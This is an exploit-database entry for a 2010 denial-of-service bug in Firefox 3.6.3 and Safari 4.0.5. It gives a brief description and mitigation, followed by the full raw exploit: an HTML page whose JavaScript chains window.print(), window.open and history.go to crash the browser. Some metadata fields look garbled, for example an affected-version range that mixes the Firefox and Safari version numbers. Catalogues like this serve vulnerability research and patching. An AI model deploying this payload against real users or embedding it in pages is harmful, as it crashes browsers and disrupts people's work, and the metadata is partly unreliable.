header-logo
Suggest Exploit
vendor:
Firefox
by:
Asheesh kumar Mani Tripathi
7,5
CVSS
HIGH
Denial of Service (DoS)
20
CWE
Product Name: Firefox
Affected Version From: 3.6.3
Affected Version To: 4.0.5
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: OSX 10.6.3
2010

Dr_IDE Firefox 3.6.3 & Safari 4.0.5 window.print() DoS

This exploit is a Denial of Service (DoS) vulnerability in Firefox 3.6.3 and Safari 4.0.5. It is triggered by a malicious JavaScript code that calls the window.print() function. This causes the browser to crash and the user is unable to access the page. The exploit was discovered by Dr_IDE and tested on Firefox 3.6.3 on OSX 10.6.3 and Safari 4.0.5 on OSX 10.6.3.

Mitigation:

The user should update their browser to the latest version to ensure that they are not vulnerable to this exploit.
Source

Exploit-DB raw data:

<--
Firefox 3.6.3 window.print() DoS version 2
Found By:   Dr_IDE
Credits:    Asheesh kumar Mani Tripathi
Reference:  http://www.exploit-db.com/exploits/11432
Tested On:  Firefox 3.6.3 on OSX 10.6.3; Safari 4.0.5 on OSX 10.6.3
Tested On:
-->

<html>
<title>Dr_IDE Firefox 3.6.3 & Safari 4.0.5 window.print() DoS</title>
<script>
function test(){
window.onerror=new Function(history.go(window.open(window.print())));
}

test();
</script>
</html>

Navigation

Suggest Exploit

Services By CQR